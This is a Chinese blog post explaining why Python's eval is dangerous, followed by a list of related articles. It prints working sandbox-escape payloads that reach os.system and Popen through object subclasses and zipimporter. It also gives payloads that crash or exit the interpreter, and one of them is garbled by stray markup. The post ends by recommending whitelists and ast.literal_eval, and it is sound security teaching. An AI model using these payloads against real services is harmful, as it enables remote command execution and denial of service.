python 爲什麼說eval要慎用?使用eval 帶來的潛在風險?什麼情況下使用eval?

原創 CxsGhost 2020-06-28 02:22

原文地址:http://www.chenxm.cc/article/247.html

eval前言

In [1]: eval("2+3")
Out[1]: 5

In [2]: eval('[x for x in range(9)]')
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]

當內存中的內置模塊含有os的話,eval同樣可以做到命令執行:

In [3]: import os

In [4]: eval("os.system('whoami')")
hy-201707271917\administrator
Out[4]: 0

當然,eval只能執行Python的表達式類型的代碼,不能直接用它進行import操作,但exec可以。如果非要使用eval進行import,則使用__import__:

In [8]: eval("__import__('os').system('whoami')")
hy-201707271917\administrator
Out[8]: 0

在實際的代碼中,往往有使用客戶端數據帶入eval中執行的需求。比如動態模塊的引入,舉個栗子,一個在線爬蟲平臺上爬蟲可能有多個並且位於不同的模塊中,服務器端但往往只需要調用用戶在客戶端選擇的爬蟲類型,並通過後端的exec或者eval進行動態調用,後端編碼實現非常方便。但如果對用戶的請求處理不恰當,就會造成嚴重的安全漏洞。

安全”使用eval

現在提倡最多的就是使用eval的後兩個參數來設置函數的白名單:

Eval函數的聲明爲eval(expression[, globals[, locals]])

其中,第二三個參數分別指定能夠在eval中使用的函數等,如果不指定,默認爲globals()和locals()函數中 包含的模塊和函數。

>>> import os
>>> 'os' in globals()
True
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
>>> eval('os.system('whoami')',{},{})
Traceback (most recent call last):
  File "", line 1, in 
  File "", line 1, in 
NameError: name 'os' is not defined

如果指定只允許調用abs函數,可以使用下面的寫法:

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
  File "", line 1, in 
  File "", line 1, in 
NameError: name 'os' is not defined
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0

使用這種方法來防護,確實可以起到一定的作用,但是,這種處理方法可能會被繞過,從而造成其他問題!

繞過執行代碼1

被繞過的情景如下,小明知道了eval會帶來一定的安全風險,所以使用如下的手段去防止eval執行任意代碼:

env = {}
env["locals"]   = None
env["globals"]  = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
 
eval(users_str, env)

Python中的__builtins__是內置模塊,用來設置內置函數的模塊。比如熟悉的abs,open等內置函數,都是在該模塊中以字典的方式存儲的,下面兩種寫法是等價的:

>>> __builtins__.abs(-20)
20
>>> abs(-20)
20

我們也可以自定義內置函數,並像使用Python中的內置函數一樣使用它們:

>>> def hello():
...     print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi

小明將eval函數的作用域中的內置模塊設置爲None,好像看起來很徹底了,但依然可以被繞過。__builtins__是__builtin__的一個引用,在__main__模塊下,兩者是等價的:

>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136

根據烏雲drops提到的方法,使用如下代碼即可:

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

上面的代碼首先利用__class__和__subclasses__動態加載了object對象,這是因爲eval中無法直接使用object。然後使用object的子類的zipimporter對egg壓縮文件中的configobj模塊進行導入,並調用其內置模塊中的os模塊從而實現命令執行,當然,前提是要有configobj的egg文件。 configobj模塊很有意思,居然內置了os模塊:

>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0

和configobj類似的模塊如urllib,urllib2,setuptools等都有os的內置,理論上使用哪個都行。 如果無法下載egg壓縮文件,可以下載帶有setup.py的文件夾,加入:

from setuptools import setup, find_packages

然後執行:

python setup.py bdist_egg

就可以在dist文件夾中找到對應的egg文件。 繞過demo如下:

>>> env = {}
>>> env["locals"]   = None
>>> env["globals"]  = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0

拒絕服務攻擊1

object的子類中有很多有趣的東西,執行以下代碼查看:

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

這裏我就不輸出結果了,如果你執行的話,可以看到很多有趣的模塊,比如file,zipimporter,Quitter等。經過測試,file的構造函數是被解釋器沙箱隔離的。 簡單的,或者直接使object暴露出的子類Quitter進行退出:

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})
 
C:/>

如果運氣好,遇到對方程序中導入了os等敏感模塊,那麼Popen就可以用,並且繞過__builins__爲空的限制,例子如下:

>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
 
>>>
正在 Ping 127.0.0.1 具有 32 字節的數據:
來自 127.0.0.1 的回覆: 字節=32 時間>>

事實上,這種情況非常多,比如導入os模塊,一般用來處理路徑問題。所以說,遇到這種情況,完全可以列舉大量的功能函數,來探測目標object的子類中是否含有一些危險的函數可以直接使用。

拒絕服務攻擊2

同樣,我們甚至可以繞過__builtins__爲None,造成一次拒絕服務攻擊,Payload(來自老外blog)如下:

>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

運行上面的代碼,Python直接crash掉了,造成拒絕服務攻擊。 原理是通過嵌套的lambda來構造一片代碼段,即code對象。爲這個code對象分配空的棧,並給出相應的代碼字符串,這裏是KABOOM,在空棧上執行代碼,會出現crash。構造完成後,調用fc函數即可觸發,其思路不可謂不淫蕩。

總結:

從上面的內容我們可以看出,單單將內置模塊置爲空,是不夠的,最好的機制是構造白名單,如果覺得比較麻煩,可以使用ast.literal_eval代替不安全的eval。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

圖像的手繪效果處理

使用PIL庫和numpy庫進行圖像的手繪效果處理 代碼如下: from PIL import Image import numpy as np a = np.array(Image.open("ly.jpg").convert(

倔强 Jarrod 2020-07-04 17:56:51

socket+threading實現python多人局域網聊天室

socket+threading實現python多人局域網聊天室 服務端 import socket import threading """ 設計思路: 1.每連接一個客戶,創建一個線程 2.每個線程單獨接收一個客戶的信息,並

98* 2020-07-01 17:58:49

很強大的matplotlib

Matplotlib快速入門 - HeoLis - 博客園   一個很唯美的 matplotlib 網站,教授 散點圖,條形圖,函數積分圖等的基本繪製 https://www.cnblogs.com/linblogs/category/1

往事如yan 2020-06-30 21:47:55

Python multiprocessing.Pool的四種方法比較:: map, apply, map_async, apply_async

There are four choices to mapping jobs to process. Here are the differences: Multi-args Concurrence

往事如yan 2020-06-30 21:47:55

Python高效編程實戰---2、對象迭代與反迭代技巧

一、如何實現可迭代對象和迭代器對象 # -*- coding: utf-8 -*- import requests from collections import Iterable, Iterator class Weathe

Daphar 2020-06-30 07:50:17

Python高效編程實戰---3、字符串處理技巧

一、如何拆分含有多種分隔符的字符串 # 將字符串s分割成列表 s = 'abc,eee,weq,e eiu ew weoi|qwei\qe' 方案一:用string的split()方法 append和extend都僅只可以

Daphar 2020-06-30 07:50:17

Python高效編程實戰---1、數據結構與算法進階

一、在list\dict\set中進行篩選 在list中篩選: 方法一:[x for x in list if x>10] # 效率更高 方法二:filter(lambda x :x>10,list) # lambd

Daphar 2020-06-30 07:50:16

Python多線程實戰:用socket和threading,編寫全雙工多人聊天室(詳細講解!!)

能在局域網內實現多人聊天 一、先講一講服務器端 其中有個get模塊是自己寫的 import socket import datetime def get_ip(): """用來搞到IP""" host = so

CxsGhost 2020-06-28 02:22:20

Python中列表生成式和lambda組合使用的時候,你跳坑了嗎?

坑: 最近看了一篇blog,在裏面看到一段挺有意思的代碼。 自認爲基礎學的很紮實的我,第一反應就認爲輸出結果肯定是錯的 代碼如下: def num(): return [lambda x:i*x for i in rang

CxsGhost 2020-06-28 02:22:20

解決pycharm中,選中代碼變成多光標,並且無法複製的問題

問題描述 選中以後發現好多個光標在閃,並且無法複製 解決方法 shift+alt+insert 切換光標選擇模式 詳細解釋:https://www.jetbrains.com/help/pycharm/working-with-

CxsGhost 2020-06-28 02:22:19

python3 metaclass--創建類的過程分析

之前學python的時候就看見過metaclass的文章,沒看懂,那篇博客後面說到,metaclass是python的黑魔法99% 不會用到。於是果斷放棄。不過最近看flask-WTForm組建的源碼,一開始就是metaclass。沒辦法

xuewen1696 2020-06-26 22:43:04

【python3】自定義包管理

文章目錄 @[toc] 1.自定義包 1.1. parent 目錄中的文件 __init__.py   1.2. pack 目錄中的文件 __init__.py mod.py   1.3. pack2 目錄中的文件 __init__.p

当白 2020-06-24 12:04:14

【python3】asyncio:異步的同步寫法

基本概念:   Asynchronous I/O(異步 I/O)。當代碼需要執行一個耗時的 I/O 操作的時候, 它只發出 I/O 的指令, 並不等待 I/O 的結果, 然後去執行其它的代碼, 以提高效率。 event loop(

当白 2020-06-24 12:04:02

python 函數參數:簡明總結

1. 位置參數(必選參數) 2. 默認參數 3. 可變參數( args) 4. 關鍵字參數 (**kw) 5. 命名關鍵字參數 (, named_kw) 可變參數: def func(*args): type(args)

不懂硬件的程序猿不是好Gamer 2020-06-23 03:48:31

python模塊導入與模塊包導入

一、 import 如何工作 main.py程序第一次導入指定文件mod.py時,執行: 找到模塊文件mod.py 編譯成字節碼(可選) 執行.pyc字節碼,創建mod.py中定義的對象。 導入模塊後,模塊對象會被存儲在sys

不懂硬件的程序猿不是好Gamer 2020-06-23 03:48:30